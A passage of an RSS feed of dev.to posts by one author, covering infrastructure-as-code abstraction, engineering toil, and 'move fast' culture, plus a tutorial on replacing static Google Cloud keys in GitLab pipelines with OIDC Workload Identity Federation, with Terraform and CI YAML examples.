      <description>&lt;p&gt;This article serves as the starting point for a microblog series exploring the challenges of managing Infrastructure-as-Code (IaC) at scale. The reflections here are solely my own views, based on my experiences and the lessons learned (sometimes the hard way) when building and maintaining large-scale infrastructure. This first entry lays the groundwork for the complexities, trade-offs, and regrets that come with designing IaC solutions.&lt;/p&gt;

&lt;h2&gt;
  
  
  In the Early Days
&lt;/h2&gt;

&lt;p&gt;When we initially adopted IaC, the goal was clear: &lt;em&gt;manage multiple environments efficiently, at scale, with precision and consistency&lt;/em&gt;. This is a vision many teams share, but as scale grows, the constraints of existing tools become apparent. Terraform’s native capabilities, while powerful (and since expanded with workspaces and other extensible features), were limiting when trying to orchestrate infrastructure across multiple AWS organizations and dozens of accounts in a DRY and reusable way.&lt;/p&gt;

&lt;p&gt;I came across numerous tutorials demonstrating the simplicity of spinning up an EC2 instance in &lt;code&gt;us-east-1&lt;/code&gt;, but when that scales to provisioning 500 servers across multiple AWS organizations, those examples fall apart. At this point, the choices become either extending Terraform’s capabilities with additional tooling or abandoning DRY principles and managing complexity through repetition.&lt;/p&gt;

&lt;p&gt;Initially, abstraction seemed like the best answer. However, a problem emerged that I hadn’t anticipated: over-abstraction became a form of technical debt. Abstraction is meant to encapsulate complexity, but when done poorly, it creates opacity—a lack of visibility into what’s actually happening under the hood. When a system inevitably breaks, new team members must wade through multiple layers of abstraction just to diagnose a simple issue. What started as an attempt to simplify infrastructure management ended up creating barriers to understanding and troubleshooting. The real challenge becomes: &lt;em&gt;How do we balance complexity with simplifying processes without over-abstracting everything?&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Where Abstraction Becomes a Liability
&lt;/h2&gt;

&lt;p&gt;While abstraction is often framed as a best practice, it can quickly become a liability. Deeply nested modules make understanding resource interactions difficult. Custom wrappers and internal CLIs built on top of Terraform introduce learning curves and debugging complexity. Hidden dependencies, such as implicit tagging schemes or assumptions baked into modules, make troubleshooting non-obvious issues much harder. At some point, abstraction reaches a point of diminishing returns, where the overhead required to maintain and debug it outweighs the benefits of reuse.&lt;/p&gt;

&lt;h2&gt;
  
  
  How to Balance Simplicity with Over-Abstraction
&lt;/h2&gt;

&lt;p&gt;To prevent abstraction from becoming a burden, it’s critical to strike the right balance. Escape hatches must exist so engineers can bypass abstractions when needed. A Terraform module should allow direct modification of key parameters rather than enforcing rigid defaults. Observability must be a first-class concern; abstractions should provide clear logs, structured outputs, and access to underlying configurations. Versioning and documentation should be explicit and ensure that abstractions are transparent in their purpose. Finally, abstractions should only be introduced once a pattern has been implemented natively at least once. Premature abstraction often leads to overengineering rather than efficiency.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;The key takeaway is that abstraction in IaC should be a tool for scalability, not avoidance of complexity. If the complexity of an abstraction exceeds the complexity of the problem it was meant to solve, it’s doing more harm than good. This is just the beginning of the discussion. In future posts, I’ll explore random challenges and thoughts that pop up as we navigate the wild world of infrastructure together.&lt;/p&gt;

&lt;p&gt;If you're interested in more of my work, feel free to check out &lt;a href="https://github.com/RoseSecurity" rel="noopener noreferrer"&gt;my GitHub&lt;/a&gt;. It's where I keep all of the good stuff.&lt;/p&gt;

</description>
      <category>terraform</category>
      <category>aws</category>
      <category>infrastructureascode</category>
      <category>architecture</category>
    </item>
    <item>
      <title>Engineering in Quicksand</title>
      <dc:creator>RoseSecurity</dc:creator>
      <pubDate>Tue, 08 Apr 2025 02:10:37 +0000</pubDate>
      <link>https://dev.to/rosesecurity/engineering-in-quicksand-31p7</link>
      <guid>https://dev.to/rosesecurity/engineering-in-quicksand-31p7</guid>
      <description>&lt;p&gt;Welcome to part two of my microblog series on the overlooked killers of engineering teams—the problems that quietly erode productivity in the DevOps community without getting much attention. I previously covered over-abstraction as a liability, showing how excessive layers of abstraction introduce technical debt.&lt;/p&gt;

&lt;p&gt;Today, I’m tackling another silent killer: toil. It’s the invisible weight dragging teams down, forcing engineers to maintain instead of build. While some toil is inevitable, too much of it suffocates innovation and drives attrition. Let’s talk about how it happens—and how to stop it.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Birth of Toil
&lt;/h2&gt;




&lt;p&gt;&lt;em&gt;"Needing a human in the loop isn’t a feature... it’s a failure. And as your system grows, so does the cost of that failure. What’s ‘normal’ today won’t be tomorrow."&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;When I first stepped into the world of Site Reliability Engineering, I was introduced to the concept of toil. Google’s SRE handbook defines toil as anything repetitive, manual, automatable, reactive, and scaling with service growth—but in reality, it’s much worse than that. Toil isn’t just a few annoying maintenance tickets in Jira; it’s a tax on innovation. It’s the silent killer that keeps engineers stuck in maintenance mode instead of building meaningful solutions.&lt;/p&gt;

&lt;p&gt;I saw this firsthand when I joined a new team plagued by recurring Jira tickets from a failing &lt;code&gt;dnsmasq&lt;/code&gt; service on their autoscaling GitLab runner VMs. The alarms never stopped. At first, I was horrified when the proposed fix was simply restarting the daemon and marking the ticket as resolved. The team had been so worn down by years of toil and firefighting that they’d rather SSH into a VM and run a command than investigate the root cause. They weren’t lazy—they were fatigued.&lt;/p&gt;

&lt;p&gt;This kind of toil doesn’t happen overnight. It’s the result of years of short-term fixes that snowball into long-term operational debt. When firefighting becomes the norm, attrition spikes, and innovation dies. The team stops improving things because they’re too busy keeping the lights on. Toil is self-inflicted, but the first step to recovery is recognizing it exists and having the will to automate your way out of it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Addressing Toil and Moving Forward
&lt;/h2&gt;

&lt;p&gt;By now, I’ve spent plenty of time hammering home how toil is silently killing your engineering team, but let’s be real—not all toil is bad. Some engineers actually enjoy the predictability of a well-understood, repeatable task. The problem isn’t toil itself; it’s when it overwhelms a team and leaves no room for innovation.&lt;/p&gt;

&lt;p&gt;Toil isn’t a constant—it fluctuates. One quarter might be toil-heavy, while another is more focused on feature development. The key is ensuring that engineers aren’t stuck doing toil indefinitely. Google recommends keeping toil below 50% of an engineer’s time—I go even further and suggest keeping it under 33% over sustained periods. Of course, this depends on on-call schedules, incident response, and team overhead, but the goal is clear: &lt;em&gt;minimize toil, or it will minimize your team’s effectiveness.&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  How to Reduce Toil
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Identify it early&lt;/strong&gt;. If a task is manual, repetitive, and requires intervention, label it as toil.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Automate aggressively&lt;/strong&gt;. If a machine can do it, it should be doing it.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Prioritize fixing toil&lt;/strong&gt;. Dedicate at least 33% of sprint time to resolving toil-related issues.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Create a structured backlog&lt;/strong&gt;. Label toil-related tickets (e.g., &lt;code&gt;KTLO&lt;/code&gt; – Keep The Lights On) and actively allocate resources to fix them.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Prevent new toil&lt;/strong&gt;. Shift left—design systems that don’t introduce unnecessary toil in the first place.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;At a previous job, our team made a conscious effort to tackle toil head-on. We dedicated part of every sprint to eliminating KTLO work, balancing long-term architecture improvements with reducing operational pain. Toil will never fully disappear, but by consistently addressing it, you can keep your team focused on meaningful work instead of endless firefighting.&lt;/p&gt;

&lt;p&gt;In the end, the best way to deal with toil is to stop introducing it in the first place. It might sound like a cop-out, but good engineering prevents toil before it ever becomes a problem. Shift left, automate, and keep your engineers building—not just maintaining.&lt;/p&gt;

&lt;p&gt;If you're interested in more of my work, feel free to check out &lt;a href="https://github.com/RoseSecurity" rel="noopener noreferrer"&gt;my GitHub&lt;/a&gt;. It's where I keep all of the good stuff.&lt;/p&gt;

</description>
      <category>culture</category>
      <category>workplace</category>
      <category>startup</category>
    </item>
    <item>
      <title>Rushing Toward Rewrite</title>
      <dc:creator>RoseSecurity</dc:creator>
      <pubDate>Fri, 28 Mar 2025 17:31:56 +0000</pubDate>
      <link>https://dev.to/rosesecurity/rushing-toward-rewrite-596k</link>
      <guid>https://dev.to/rosesecurity/rushing-toward-rewrite-596k</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;This post originally appeared on &lt;a href="https://rosesecurity.dev/blog/2025/03/26/rushing-toward-rewrite" rel="noopener noreferrer"&gt;rosesecurity.dev&lt;/a&gt;. If you like deep dives on infrastructure, Terraform, and the real cost of technical choices, follow along there too.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;This is part three of my microblog series exploring the subtle dysfunctions that plague engineering organizations. After discussing over-abstraction as a liability and unpacking how excessive toil kills engineering teams, this post tackles a nuanced threat: when “moving fast” becomes a cultural shortcut for cutting corners.&lt;/p&gt;

&lt;h2&gt;
  
  
  Move Fast and Don’t Break Everything
&lt;/h2&gt;

&lt;p&gt;A former CEO of mine used to say: &lt;em&gt;“Be fast or be perfect. And since no one’s perfect, you better be fast.”&lt;/em&gt; Sounds cool until that motto becomes a shield to skip due diligence, code reviews, and even basic security hygiene. Speed wasn’t a value—it was an excuse. PRs rushed. On-call flaring. Postmortems piling. And still, engineers asking for admin access “to move fast.”&lt;/p&gt;

&lt;p&gt;Spoiler: they didn’t need it.&lt;/p&gt;

&lt;p&gt;The deeper problem? We weren’t a scrappy startup anymore—we were operating at enterprise scale with a startup mindset. The cost of speed was technical debt, fragility, and a long tail of rework. When I transitioned to a new role (back in startup mode) I heard the same “move fast” mantra. But this time, it hit differently. Because here’s the truth: &lt;em&gt;moving fast is possible without setting your future self on fire&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;Here’s what I’ve learned:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Fail fast—but fail forward.&lt;/strong&gt; Don’t just throw things at prod and hope they stick. Structure your failures. If a solution’s not viable, surface that early with data and a path forward. Good failure leaves breadcrumbs for the next iteration.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Build for iteration.&lt;/strong&gt; Forget perfect. Aim for clear next steps. Your &lt;code&gt;v1&lt;/code&gt; should be designed with a roadmap in mind. Where will this evolve? What trade-offs are you making? Ship it—but know how you’ll ship it &lt;em&gt;better&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Stay modular.&lt;/strong&gt; Design with exits. If your observability pipeline starts with a pricey SaaS, fine. But make it swappable. Keep your vendor coupling thin so you can self-host later without a complete rewrite.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. Be honest about scale.&lt;/strong&gt; What worked for a team of 10 won’t work at 100. “Move fast” looks different when customers depend on your uptime. Match your velocity with the blast radius of your decisions.&lt;/p&gt;

&lt;p&gt;We glamorize speed, but the smartest teams know when to slow down, breathe, and make thoughtful decisions that stand the test of time. Move fast—but don’t break the foundation.&lt;/p&gt;

</description>
      <category>devops</category>
      <category>terraform</category>
      <category>softwareengineering</category>
      <category>techdebt</category>
    </item>
    <item>
      <title>Upgrading GitLab CI/CD Authentication: Migrating to OIDC for Google Cloud</title>
      <dc:creator>RoseSecurity</dc:creator>
      <pubDate>Tue, 27 Feb 2024 03:34:14 +0000</pubDate>
      <link>https://dev.to/rosesecurity/upgrading-gitlab-cicd-authentication-migrating-to-oidc-for-google-cloud-3kd5</link>
      <guid>https://dev.to/rosesecurity/upgrading-gitlab-cicd-authentication-migrating-to-oidc-for-google-cloud-3kd5</guid>
      <description>&lt;h2&gt;
  
  
  The Challenge
&lt;/h2&gt;

&lt;p&gt;Why should I migrate my pipelines to OIDC? I have my Service Account credentials stored securely in a CI/CD variable, and I don't plan on it going anywhere. Here's the thing, static keys present a significant risk of compromise since they remain constant over time. If these keys are compromised, an attacker could potentially manipulate the cloud environment undetected for an extended period, posing a severe threat to the security and integrity of the infrastructure and the data stored within it. Additionally, static keys lack context and are highly portable, exacerbating the security risk. Unlike dynamically generated tokens or keys tied to specific environments, static keys can be copied and used across multiple environments without any linkage to their origin. This portability makes it challenging for security teams to trace the usage of these keys and identify where they are being utilized, thereby increasing the difficulty of detecting and mitigating unauthorized access or malicious activities. Introducing OIDC!&lt;/p&gt;

&lt;h2&gt;
  
  
  The Benefits of OIDC
&lt;/h2&gt;

&lt;p&gt;Using Google Cloud's Workload Identity Federation is the safer and recommended way to authenticate your GitLab pipelines with Google Cloud. Workload Identity Federation eliminates the need to issue static keys for authentication, removing the burden of long-term key management. With Workload Identity Federation, there is no compliance requirement to rotate secrets every few months, since temporary access tokens are issued each time! This greatly reduces the risk of leaked credentials or compromised access, since the tokens are short-lived. Overall, Workload Identity Federation provides a more secure and lower maintenance way to connect GitLab pipelines to Google Cloud resources compared to using static service account keys. The temporary tokens provide defense in depth against leaked credentials, while freeing developers from having to constantly rotate keys.&lt;/p&gt;

&lt;h2&gt;
  
  
  How it Works
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpq8nrrzlmxt54xi6qgm5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpq8nrrzlmxt54xi6qgm5.png" alt="How it Works" width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Demonstration
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Existing Infrastructure
&lt;/h3&gt;

&lt;p&gt;In the following demonstration, we will showcase the infrastructure that enables secure authentication between a GitLab pipeline and Google Cloud resources. When the GitLab pipeline is triggered, Workload Identity Federation will automatically exchange the pipeline's credentials for temporary IAM access tokens to deploy into Google Cloud. The following are existing components within the CI/CD pipeline and Google Cloud: &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Terraform Service Account for the pipelines&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fthhacgnsk09hc0n2akvs.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fthhacgnsk09hc0n2akvs.png" alt="Service Account" width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Pipeline utilizing Service Account static credentials to create infrastructure
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;stages&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;validate&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;test&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;build&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;deploy&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;cleanup&lt;/span&gt;

&lt;span class="na"&gt;before_script&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;cat $GCP_CREDENTIALS &amp;gt; /tmp/gcp_credentials.json&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Harnessing Google Workload Identity
&lt;/h3&gt;

&lt;p&gt;The following &lt;a href="https://gitlab.com/gitlab-com/gl-security/security-operations/infrastructure-security-public/oidc-modules" rel="noopener noreferrer"&gt;Terraform &lt;code&gt;oidc&lt;/code&gt; module&lt;/a&gt; does the following:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Workload Identity Pool Creation:&lt;br&gt;
    - Creates a new Google Cloud Workload Identity Pool with an ID derived from either a provided &lt;code&gt;workload_identity_name&lt;/code&gt; or &lt;code&gt;gitlab_project_id&lt;/code&gt;.&lt;br&gt;
    - Associates the pool with a Google Cloud project specified by &lt;code&gt;google_project_id&lt;/code&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Workload Identity Provider Creation:&lt;br&gt;
    - Creates a new Google Cloud Workload Identity Provider inside the previously created pool (The provider's ID is derived similarly to the pool ID).&lt;br&gt;
    - Sets conditions for attribute mapping based on the provided parameters.&lt;br&gt;
    - Maps attributes from the OIDC token to attributes understood by Google Cloud IAM.&lt;br&gt;
    - Configures OIDC settings such as the issuer URI (&lt;code&gt;gitlab_url&lt;/code&gt;) and allowed audiences (&lt;code&gt;allowed_audiences&lt;/code&gt;).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Permission Granting:&lt;br&gt;
    - Grants permissions for Service Account impersonation by creating IAM bindings.&lt;br&gt;
        - For each service account specified in &lt;code&gt;var.oidc_service_account&lt;/code&gt;, it binds the role &lt;code&gt;roles/iam.workloadIdentityUser&lt;/code&gt;.&lt;br&gt;
    - Grants access to the principal set of the previously created identity pool for each service account.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Our &lt;code&gt;main.tf&lt;/code&gt; file will look like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight terraform"&gt;&lt;code&gt;&lt;span class="k"&gt;module&lt;/span&gt; &lt;span class="s2"&gt;"gitlab_oidc"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;source&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"./modules/oidc"&lt;/span&gt;

  &lt;span class="nx"&gt;google_project_id&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kd"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;google_project_id&lt;/span&gt;
  &lt;span class="nx"&gt;gitlab_project_id&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kd"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;gitlab_project_id&lt;/span&gt;
  &lt;span class="nx"&gt;oidc_service_account&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="s2"&gt;"sa"&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;sa_email&lt;/span&gt;  &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kd"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;service_account_email&lt;/span&gt;
      &lt;span class="nx"&gt;attribute&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"attribute.project_id/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="kd"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;gitlab_project_id&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The output from a &lt;code&gt;terraform apply&lt;/code&gt; will provide us with the needed information for migrating our existing pipelines to OIDC:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;Apply complete! Resources: 3 added, 0 changed, 0 destroyed.
Outputs:
workload_identity_pool = "projects/458331852021/locations/global/workloadIdentityPools/gl-id-pool-oidc-55282716/providers/gitlab-jwt-55282716"
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Making use of the &lt;a href="https://gitlab.com/gitlab-com/gl-security/security-operations/infrastructure-security-public/oidc-modules/-/raw/3.1.2/templates/gcp_auth.yaml" rel="noopener noreferrer"&gt;CI Template&lt;/a&gt; provided by GitLab's infrastructure security team, we can add these variables to our pipeline to authenticate via OIDC:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;include&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;remote&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;https://gitlab.com/gitlab-com/gl-security/security-operations/infrastructure-security-public/oidc-modules/-/raw/3.1.2/templates/gcp_auth.yaml'&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;template&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Terraform/Base.gitlab-ci.yml"&lt;/span&gt;

&lt;span class="na"&gt;variables&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;WI_POOL_PROVIDER&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;//iam.googleapis.com/projects/458331852021/locations/global/workloadIdentityPools/gl-id-pool-oidc-55282716/providers/gitlab-jwt-55282716&lt;/span&gt;
  &lt;span class="na"&gt;SERVICE_ACCOUNT&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;terraform@oidc-demo-415417.iam.gserviceaccount.com&lt;/span&gt;

&lt;span class="na"&gt;build&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;extends&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;.google-oidc:auth&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;.terraform:build&lt;/span&gt;

&lt;span class="na"&gt;deploy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;extends&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;.google-oidc:auth&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;.terraform:deploy&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now that we have this in place, we can create resources using OIDC:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight terraform"&gt;&lt;code&gt;&lt;span class="k"&gt;module&lt;/span&gt; &lt;span class="s2"&gt;"compute_engine"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;source&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"./modules/compute-engine"&lt;/span&gt;

  &lt;span class="nx"&gt;instance_name&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"oidc-demo-instance"&lt;/span&gt;
  &lt;span class="nx"&gt;zone&lt;/span&gt;          &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"us-central1-a"&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And we can see that the resource is created:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;Terraform has been successfully initialized!
module.gitlab_oidc.google_iam_workload_identity_pool.gitlab_pool: Creating...
module.compute_engine.google_compute_instance.default: Creating...
module.compute_engine.google_compute_instance.default: Still creating... [10s elapsed]
module.compute_engine.google_compute_instance.default: Creation complete after 13s [id=projects/oidc-demo-415417/zones/us-central1-a/instances/oidc-demo-instance]
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;This article highlights the security and automation benefits of Workload Identity Federation for connecting GitLab pipelines to Google Cloud. By automatically exchanging pipeline identities for short-lived IAM access tokens, Workload Identity Federation removes the risks of long-term credentials while enabling access between GitLab and Google Cloud. With minimal setup, pipelines can securely deploy to Google Cloud without managing static keys. Stay safe out there!&lt;/p&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://about.gitlab.com/blog/2023/06/28/introduction-of-oidc-modules-for-integration-between-google-cloud-and-gitlab-ci/" rel="noopener noreferrer"&gt;How OIDC can simplify authentication of GitLab CI/CD pipelines with Google Cloud&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>devops</category>
      <category>cloud</category>
      <category>gitlab</category>
      <category>googlecloud</category>
    </item>
  </channel>
</rss>
